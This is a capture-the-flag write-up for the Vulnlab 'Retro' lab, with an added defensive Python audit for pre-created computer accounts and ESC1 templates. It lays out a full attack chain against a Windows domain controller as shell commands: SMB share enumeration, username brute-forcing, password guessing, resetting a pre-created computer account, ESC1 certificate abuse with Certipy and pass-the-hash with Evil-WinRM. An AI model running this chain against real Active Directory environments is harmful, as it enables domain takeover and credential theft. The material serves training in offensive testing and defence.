Vulnlab Retro

Vulnlab Retro Writeup

Overview

Retro is an easy-difficulty machine created by r0BIT. It starts with enumerating SMB shares, where notes point to a pre-created computer account, which is then used to exploit an ADCS template vulnerable to ESC1.

Nmap Scan

nmap -sCV -Pn 10.10.74.226               [10:23:56]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-19 10:24 EST
Nmap scan report for 10.10.74.226
Host is up (0.22s latency).
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-19 15:26:28Z)
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after: 2025-11-19T15:16:42
|_ssl-date: TLS randomness does not represent time
464/tcp open kpasswd5?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after: 2025-11-19T15:16:42
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2024-11-19T15:16:42
|_Not valid after: 2025-11-19T15:16:42
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Enumerating Shares

Let’s try to enumerate the shares and see whether they allow anonymous login.

smbclient -L //10.10.74.226

Figure 1

From the screenshot above, we can see that we have two non-default shares: Notes and Trainees.

Let’s try to connect to the Trainees share, still anonymously.

smbclient -U "anonymous" \\\\10.10.74.226\\Trainees 

We can see a file, Important.txt. Let’s download it and review it.

Figure 2

cat Important.txt

Figure 3

We have new information: the trainees don’t use strong, unique passwords, and everyone is bundled into a single account.

If we try to enumerate the Notes share, we can connect to it but cannot list its contents.

smbclient -U "anonymous" \\\\10.10.74.226\\Notes 

Figure 4

Finding Valid Users With Kerbrute

Let’s enumerate some accounts with Kerbrute, but first add retro.vl and DC.retro.vl to our hosts file (look again at the ssl-cert output of the Nmap scan for these DNS names).

sudo vim /etc/hosts

Figure 5

Now we can run Kerbrute.

kerbrute userenum -d retro.vl --dc 10.10.74.226 /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames-dup.txt

Figure 6

We found new non default users!

Now, do you remember Important.txt? It said that all the trainees are bundled into one account; we now have the account name: trainee@retro.vl.

Enumerate Shares from Trainee’s Account

We know that the trainees cannot remember a strong password, so we can assume they are using a weak one.

Let’s try some password guessing with NetExec and see whether they also use trainee as their password.

netexec smb 10.10.74.226 -u trainee -p trainee

Figure 7

Bingo! We found the password for the user trainee. Now let’s see if we have more privileges and enumerate the Notes share that we couldn’t list earlier, using the credentials trainee / trainee.

smbclient -U "trainee" \\\\10.10.74.226\\Notes

Figure 8

We can list the share and find a new file, ToDo.txt, which we download.

Let’s look at the content of the file.

Figure 9

We have new information. First, we can assume that Thomas is the user found with Kerbrute, tblack@retro.vl.

We can also see that they use a very old pre-created computer account.

Exploiting the Pre-Created Computer Account

A quick Google search for "pre created computer account" will lead you to the first link, from TrustedSec: https://trustedsec.com/blog/diving-into-pre-created-computer-accounts

Let’s follow this article; I highly recommend you read it so you will have a good understanding of what we are doing.

First, let’s enumerate computer accounts using ldapsearch.

ldapsearch -x -H ldap://10.10.74.226 -D "trainee@RETRO.vl" -w "trainee" -b "CN=Computers,DC=RETRO,DC=vl" "(objectClass=computer)" sAMAccountName

Figure 10

We found the computer account: BANKING$
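As an added, defender-side example (not from the writeup), here is how such an account stands out in its LDAP attributes: the "pre-Windows 2000 computer" option sets the PASSWD_NOTREQD bit in userAccountControl (4128 instead of the usual 4096 for a workstation), and a logonCount of 0 means no host ever joined with it, so the password is still the one assigned at creation (the lowercase computer name). The entries are constructed sample data in the shape of ldapsearch output.

```python
"""Audit computer objects for the pre-Windows 2000 (pre-created) state.

Added example, not part of the writeup. SAMPLE_COMPUTERS is constructed data;
in practice the entries would come from an LDAP query like the one above,
extended with the userAccountControl and logonCount attributes.
"""

# userAccountControl bits from the Active Directory schema.
PASSWD_NOTREQD = 0x0020             # set by "Assign this computer account as a pre-Windows 2000 computer"
WORKSTATION_TRUST_ACCOUNT = 0x1000  # member computer
SERVER_TRUST_ACCOUNT = 0x2000       # domain controller

SAMPLE_COMPUTERS = [  # constructed sample data
    {"sAMAccountName": "DC$", "userAccountControl": 532480, "logonCount": 3120},  # 0x82000: DC, trusted for delegation
    {"sAMAccountName": "WS01$", "userAccountControl": 4096, "logonCount": 57},    # 0x1000: normal workstation
    {"sAMAccountName": "BANKING$", "userAccountControl": 4128, "logonCount": 0},  # 0x1020: pre-created, never joined
]


def is_pre_created(entry):
    """True when a computer account carries PASSWD_NOTREQD (4128 is the classic value)."""
    uac = int(entry["userAccountControl"])
    is_computer = bool(uac & (WORKSTATION_TRUST_ACCOUNT | SERVER_TRUST_ACCOUNT))
    return is_computer and bool(uac & PASSWD_NOTREQD)


def audit(entries):
    """Return (sAMAccountName, never_logged_on) for each flagged account.

    never_logged_on means no machine ever joined with the account, so its
    password is still the default from creation; such objects should be
    deleted or re-created rather than left in the directory.
    """
    return [
        (e["sAMAccountName"], int(e.get("logonCount", 0)) == 0)
        for e in entries
        if is_pre_created(e)
    ]


if __name__ == "__main__":
    for name, unused in audit(SAMPLE_COMPUTERS):
        state = "never joined, default password likely" if unused else "joined at some point"
        print(f"{name}: pre-Windows 2000 flag set ({state})")
```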

We can change the password with kpasswd; first we install krb5-user and configure krb5.conf so it knows about the realm.

sudo apt-get install krb5-user
sudo vim /etc/krb5.conf

Your krb5.conf file should look exactly like the following.

[libdefaults]
    default_realm = RETRO.VL
    dns_lookup_realm = false
    ticket_lifetime = 24h
    renew_lifetime = 7d
    rdns = false
    kdc_timesync = 1
    ccache_type = 4
    forwardable = true
    proxiable = true

[realms]
    RETRO.VL = {
        kdc = DC.RETRO.VL
        admin_server = DC.RETRO.VL
    }

Figure 11

Alright, now let’s try to change the password for BANKING$. It will ask for the current password: type banking (a pre-created computer account’s password is the lowercase computer name).

We will change it to Password123.

kpasswd BANKING$

Figure 12

Let’s check with NetExec that the change succeeded.

netexec smb 10.10.74.226 -u banking$ -p Password123

Figure 13

ADCS Attack

Let’s use Certipy to see if we can abuse ADCS.

certipy-ad find -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -vulnerable -enabled

Figure 14

We can see it saved the results in multiple formats; you can use them with BloodHound. We are not going to use BloodHound today; we will stick with the JSON file.

Let’s see if a template is misconfigured and attackable (note that the file name will be different for you).

cat 20241119114211_Certipy.json | grep "ESC*"

Figure 15

We may be able to attack the template: RetroClients is misconfigured (ESC1), allowing machine accounts to enroll while supplying the subject themselves, i.e. to request a certificate in another user’s name.

Now let’s cat 20241119114211_Certipy.json again, because we need the template name and the certificate authority name.

cat 20241119114211_Certipy.json

Figure 16

Now let’s abuse it to get a certificate for the Administrator account.

certipy-ad req -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -target DC.retro.vl -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl'

Figure 17

As you can see, that’s not working; look at the error: it says the problem is the key length.

Let’s look at the JSON file again.

cat 20241119114211_Certipy.json

Figure 18

We can see the minimum key length is 4096, but the Certipy GitHub repo shows that the default key size is 2048.
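Instead of grepping the JSON, here is an added example (not from the writeup or from Certipy) that evaluates the ESC1 conditions the page relies on over a constructed export in Certipy’s JSON shape: enabled, client-authentication EKU, enrollee supplies subject, no manager approval or authorized signatures, and enrollment rights granted to a low-privilege group. It also returns the template’s minimum RSA key length, the value that caused the failure above. Field names are assumed from Certipy’s output; compare them with your own file.

```python
import json
# Constructed sample shaped like a Certipy "find" JSON export (field names assumed, values illustrative).
SAMPLE_CERTIPY_JSON = json.dumps({
    "Certificate Templates": {
        "0": {
            "Template Name": "RetroClients",
            "Certificate Authorities": ["retro-DC-CA"],
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": True,       # requester chooses the SAN: the core of ESC1
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Minimum RSA Key Length": 4096,           # why a default 2048-bit request is rejected
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["RETRO.VL\\Domain Computers", "RETRO.VL\\Domain Admins"]}},
        },
        "1": {
            "Template Name": "User",
            "Certificate Authorities": ["retro-DC-CA"],
            "Enabled": True,
            "Client Authentication": True,
            "Enrollee Supplies Subject": False,      # subject built from AD, so not ESC1
            "Requires Manager Approval": False,
            "Authorized Signatures Required": 0,
            "Minimum RSA Key Length": 2048,
            "Permissions": {"Enrollment Permissions": {
                "Enrollment Rights": ["RETRO.VL\\Domain Users"]}},
        },
    },
})

# Enrollment rights for any of these make a template reachable by every domain member.
LOW_PRIV_PRINCIPALS = {"Domain Computers", "Domain Users", "Authenticated Users", "Everyone"}

def esc1_templates(certipy_json):
    """Return (template, CAs, min_key_length) for every template meeting all ESC1 conditions."""
    findings = []
    for tpl in json.loads(certipy_json).get("Certificate Templates", {}).values():
        perms = tpl.get("Permissions", {}).get("Enrollment Permissions", {})
        rights = perms.get("Enrollment Rights", [])
        low_priv_enroll = any(r.split("\\")[-1] in LOW_PRIV_PRINCIPALS for r in rights)
        if (tpl.get("Enabled") and tpl.get("Client Authentication")
                and tpl.get("Enrollee Supplies Subject")
                and not tpl.get("Requires Manager Approval")
                and tpl.get("Authorized Signatures Required", 0) == 0
                and low_priv_enroll):
            findings.append((tpl["Template Name"], tpl["Certificate Authorities"],
                             tpl.get("Minimum RSA Key Length")))
    return findings
```

A template that shows up here is what a defender should fix: clear Enrollee Supplies Subject or require manager approval, and restrict who holds enrollment rights.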

Let’s run Certipy again, providing the right key size.

certipy-ad req -u 'banking$@retro.vl' -p Password123 -dc-ip 10.10.74.226 -target DC.retro.vl -ca 'retro-DC-CA' -template 'RetroClients' -upn 'administrator@retro.vl' -key-size 4096

Figure 19

We now have a different error. This is because we have to sync our virtual machine’s clock with the DC (Kerberos rejects requests when the clock skew is too large), which we can do with ntpdate.

sudo ntpdate retro.vl

Figure 20

Now run the Certipy command again, and you can see we have administrator.pfx downloaded to our machine.

Let’s retrieve the NTLM hash so we can perform a pass-the-hash attack.

certipy-ad auth -pfx administrator.pfx -dc-ip 10.10.74.226

Figure 21

Great! I did an Nmap scan of all ports and found that WinRM is open (port 5985). Let’s try Evil-WinRM for the pass-the-hash.

evil-winrm -i 10.10.74.226 -u administrator -H 252fac7066d93dd009d4fd2cd0368389

Figure 22

And we are Administrator!


Source: https://spidersec.io/writeups/Vulnlab/Vulnlab Retro/
Author: 5p1d4r
Posted on November 19, 2024